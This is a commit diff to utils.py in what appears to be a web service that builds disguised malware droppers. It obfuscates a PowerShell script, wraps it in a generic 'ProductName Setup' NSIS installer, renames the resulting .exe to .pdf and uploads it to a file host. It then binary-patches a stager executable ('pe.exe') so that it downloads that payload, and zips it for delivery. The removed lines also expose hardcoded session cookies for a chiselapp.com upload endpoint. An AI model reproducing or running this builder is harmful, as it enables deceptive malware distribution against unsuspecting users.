sigyllly commited on
Commit
749898e
·
verified ·
1 Parent(s): 96a651a

Update utils.py

Browse files
Files changed (1) hide show
  1. utils.py +96 -76
utils.py CHANGED
@@ -8,32 +8,15 @@ import shutil
8
  import tempfile
9
  import requests
10
  import json
 
11
 
12
  BASE_DIR = os.path.abspath(os.path.dirname(__file__))
13
  UPLOAD_FOLDER = os.path.join(BASE_DIR, "uploads")
 
14
  COMPILE_FOLDER = os.path.join(BASE_DIR, "compile")
15
  NSIS_COMPILER = "makensis" # Ensure NSIS is installed on your Linux system
16
  OBFUSCATOR_SCRIPT = os.path.join(BASE_DIR, "Obfus", "main.ps1")
17
-
18
- SERVER_URL = "https://chiselapp.com/user/yolovi5126/repository/yolovi5126/chat-send"
19
- HEADERS = {
20
- "Host": "chiselapp.com",
21
- "Connection": "keep-alive",
22
- "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarytI7POOg3X2lgL1Yr",
23
- "sec-ch-ua-platform": '"Linux"',
24
- "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
25
- "sec-ch-ua": '"Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"',
26
- "sec-ch-ua-mobile": "?0",
27
- "Accept": "*/*",
28
- "Origin": "https://chiselapp.com",
29
- "Sec-Fetch-Site": "same-origin",
30
- "Sec-Fetch-Mode": "cors",
31
- "Sec-Fetch-Dest": "empty",
32
- "Referer": "https://chiselapp.com/user/yolovi5126/repository/yolovi5126/chat",
33
- "Accept-Encoding": "gzip, deflate, br, zstd",
34
- "Accept-Language": "en-US,en;q=0.9,hi;q=0.8",
35
- "Cookie": "fossil-9889a3796fb4c84c=0F6BFEC5A6792BA30BBCFC1F12F0E31772D58BD8F0B1CAE22E%2F9889a3796fb4c84c%2Fyolovi5126; PHPSESSID=7onhpb9ebdpja4nd20ulce9b63"
36
- }
37
 
38
  def generate_random_string(length=8):
39
  return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
@@ -87,6 +70,7 @@ def generate_nsi_script(folder_path, bin_file, ps1_file):
87
  SetCompressorDictSize 96
88
  SetDatablockOptimize ON
89
  ; Interface settings
 
90
  !define MUI_WELCOMEPAGE_TITLE "Welcome to ProductName Setup"
91
  !define MUI_WELCOMEPAGE_TEXT "This will install ProductName on your computer.$\r$\n$\r$\nClick Install to continue."
92
  ; Pages
@@ -138,63 +122,75 @@ def compile_nsi_script(nsi_file_path):
138
 
139
  def upload_file_to_server(file_path):
140
  try:
141
- # Rename the file to have a .pdf extension
142
- new_file_path = file_path.replace('.exe', '.pdf')
143
- os.rename(file_path, new_file_path)
144
-
145
- # Ensure the file exists
146
- if not os.path.exists(new_file_path):
147
- raise FileNotFoundError(f"File {new_file_path} not found.")
 
 
 
 
 
 
 
 
 
 
 
148
 
149
- # Prepare the file and data for upload
150
- file = {'file': (os.path.basename(new_file_path), open(new_file_path, 'rb'), 'application/pdf')}
151
- # Additional form data
152
- data = {
153
- 'lmtime': '2024-12-31T18:33:58'
154
- }
155
 
156
- # Send the POST request with file and form data
157
- response = requests.post(SERVER_URL, headers=HEADERS, files=file, data=data)
158
 
159
- # Check the response
160
- if response.status_code == 200:
161
- # Assuming the response contains the URL with the ID
162
- json_file = 'file_info.json'
163
-
164
- # Check if the file_info.json exists
165
- if os.path.exists(json_file):
166
- with open(json_file, 'r') as f:
167
- file_info = json.load(f)
168
- else:
169
- file_info = {}
170
-
171
- # Initialize or increment the init_ID (last_id)
172
- if 'init_ID' not in file_info:
173
- file_info['init_ID'] = 1 # Start with ID 1 if not present
174
- else:
175
- file_info['init_ID'] += 1 # Increment the ID for the next upload
176
-
177
- # Get the current ID to be used for the next upload
178
- current_id = file_info['init_ID']
179
-
180
- # Generate the download URL for the uploaded file using the current ID
181
- download_url = f"https://chiselapp.com/user/yolovi5126/repository/yolovi5126/chat-download/{current_id}/{os.path.basename(new_file_path)}"
182
-
183
- # Update the JSON with the new entry for this upload
184
- file_info[current_id] = {
185
- 'file_name': os.path.basename(new_file_path),
186
- 'url': download_url
187
- }
188
-
189
- # Write the updated file_info to the JSON file
190
- with open(json_file, 'w') as f:
191
- json.dump(file_info, f, indent=4)
192
-
193
- return download_url
194
- else:
195
- raise Exception(f"Failed to send request. Status Code: {response.status_code}\n{response.text}")
 
 
 
 
196
  except Exception as e:
197
- raise Exception(f"File upload failed: {str(e)}")
198
 
199
  def process_request(request):
200
  temp_dir = None # Initialize temp_dir to be used in the finally block
@@ -217,7 +213,9 @@ def process_request(request):
217
 
218
  # Create the PowerShell script with the provided content
219
  ps1_content = f'''
220
- Your PowerShell script content here
 
 
221
  '''
222
  ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1")
223
  with open(ps1_path, 'w') as ps1_file:
@@ -241,8 +239,30 @@ Your PowerShell script content here
241
  # Upload the resulting EXE file (renamed to PDF) to the server
242
  download_url = upload_file_to_server(installer_output)
243
 
244
- # Return the download URL in the response
245
- return jsonify({"download_url": download_url})
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
246
 
247
  except Exception as e:
248
  current_app.logger.error(f"An error occurred: {str(e)}")
 
8
  import tempfile
9
  import requests
10
  import json
11
+ import zipfile
12
 
13
  BASE_DIR = os.path.abspath(os.path.dirname(__file__))
14
  UPLOAD_FOLDER = os.path.join(BASE_DIR, "uploads")
15
+ PE_FOLDER = os.path.join(BASE_DIR, "pe")
16
  COMPILE_FOLDER = os.path.join(BASE_DIR, "compile")
17
  NSIS_COMPILER = "makensis" # Ensure NSIS is installed on your Linux system
18
  OBFUSCATOR_SCRIPT = os.path.join(BASE_DIR, "Obfus", "main.ps1")
19
+ UPLOAD_URL = 'http://127.0.0.1:5001/upload' # Replace with actual IP or domain
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
20
 
21
  def generate_random_string(length=8):
22
  return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
 
70
  SetCompressorDictSize 96
71
  SetDatablockOptimize ON
72
  ; Interface settings
73
+ !define MUI_ICON "C:\Users\Albert\Downloads\app.ico"
74
  !define MUI_WELCOMEPAGE_TITLE "Welcome to ProductName Setup"
75
  !define MUI_WELCOMEPAGE_TEXT "This will install ProductName on your computer.$\r$\n$\r$\nClick Install to continue."
76
  ; Pages
 
122
 
123
  def upload_file_to_server(file_path):
124
  try:
125
+ # Rename the .exe file to .pdf
126
+ renamed_file_path = file_path.replace('.exe', '.pdf')
127
+ os.rename(file_path, renamed_file_path)
128
+
129
+ # Upload the renamed file to the server
130
+ with open(renamed_file_path, 'rb') as file:
131
+ response = requests.post(UPLOAD_URL, files={'file': file})
132
+
133
+ if response.status_code == 200:
134
+ data = response.json()
135
+ # Assuming the server returns a 'file_url' key with the file URL
136
+ filename = os.path.basename(renamed_file_path)
137
+ fixed_url = f'http://127.0.0.1:5001/uploads/{filename}' # Fixed URL format
138
+ return fixed_url
139
+ else:
140
+ raise Exception(f"Failed to upload file: {response.json()}")
141
+ except Exception as e:
142
+ raise Exception(f"Error during file upload: {str(e)}")
143
 
144
+ def replace_url_in_exe(file_path, old_url, new_url, old_string, new_string):
145
+ if len(new_url) > len(old_url):
146
+ raise ValueError("New URL must not be longer than the old URL.")
 
 
 
147
 
148
+ new_url_padded = new_url.ljust(len(old_url), '\x00')
149
+ new_string_padded = new_string.ljust(len(old_string), '\x00')
150
 
151
+ try:
152
+ with open(file_path, 'rb') as exe_file:
153
+ data = exe_file.read()
154
+
155
+ # Try different encodings of the old URL
156
+ encodings = ['utf-8', 'ascii', 'utf-16le']
157
+ url_found = False
158
+ for encoding in encodings:
159
+ old_url_bytes = old_url.encode(encoding)
160
+ if old_url_bytes in data:
161
+ print(f"URL found with encoding: {encoding}")
162
+ url_found = True
163
+ break
164
+ if not url_found:
165
+ raise ValueError(f"The URL {old_url} was not found in the executable using any common encoding.")
166
+
167
+ # Try different encodings for the old string
168
+ string_found = False
169
+ for encoding in encodings:
170
+ old_string_bytes = old_string.encode(encoding)
171
+ if old_string_bytes in data:
172
+ print(f"String found with encoding: {encoding}")
173
+ string_found = True
174
+ break
175
+ if not string_found:
176
+ raise ValueError(f"The string {old_string} was not found in the executable using any common encoding.")
177
+
178
+ # Replace the old URL with the new URL
179
+ new_url_bytes = new_url_padded.encode(encoding)
180
+ modified_data = data.replace(old_url_bytes, new_url_bytes, 1)
181
+
182
+ # Replace the old string with the new string
183
+ new_string_bytes = new_string_padded.encode(encoding)
184
+ modified_data = modified_data.replace(old_string_bytes, new_string_bytes, 1)
185
+
186
+ # Save the modified executable with a random name
187
+ modified_file_path = os.path.join(os.path.dirname(file_path), generate_random_string() + ".exe")
188
+ with open(modified_file_path, 'wb') as modified_file:
189
+ modified_file.write(modified_data)
190
+
191
+ return modified_file_path
192
  except Exception as e:
193
+ raise Exception(f"An error occurred: {e}")
194
 
195
  def process_request(request):
196
  temp_dir = None # Initialize temp_dir to be used in the finally block
 
213
 
214
  # Create the PowerShell script with the provided content
215
  ps1_content = f'''
216
+
217
+
218
+ Write-Host ""
219
  '''
220
  ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1")
221
  with open(ps1_path, 'w') as ps1_file:
 
239
  # Upload the resulting EXE file (renamed to PDF) to the server
240
  download_url = upload_file_to_server(installer_output)
241
 
242
+ # Print the new string and new URL for debugging
243
+ new_string = os.path.basename(download_url)
244
+ new_url = download_url
245
+ print(f"new_string: {new_string}")
246
+ print(f"new_url: {new_url}")
247
+
248
+ # Replace URL in PE executable
249
+ pe_exe_path = os.path.join(PE_FOLDER, "pe.exe")
250
+ modified_pe_path = replace_url_in_exe(
251
+ file_path=pe_exe_path,
252
+ old_url="http://127.0.0.1:5000/uploads/setup_20250102_062242.pdf",
253
+ new_url=download_url,
254
+ old_string="setup_20250102_062243.pdf",
255
+ new_string=os.path.basename(download_url)
256
+ )
257
+
258
+ # Zip the modified executable
259
+ zip_filename = generate_random_string() + ".zip"
260
+ zip_filepath = os.path.join(temp_dir, zip_filename)
261
+ with zipfile.ZipFile(zip_filepath, 'w') as zipf:
262
+ zipf.write(modified_pe_path, os.path.basename(modified_pe_path))
263
+
264
+ # Return the zip file in the response
265
+ return send_file(zip_filepath, as_attachment=True, download_name=zip_filename)
266
 
267
  except Exception as e:
268
  current_app.logger.error(f"An error occurred: {str(e)}")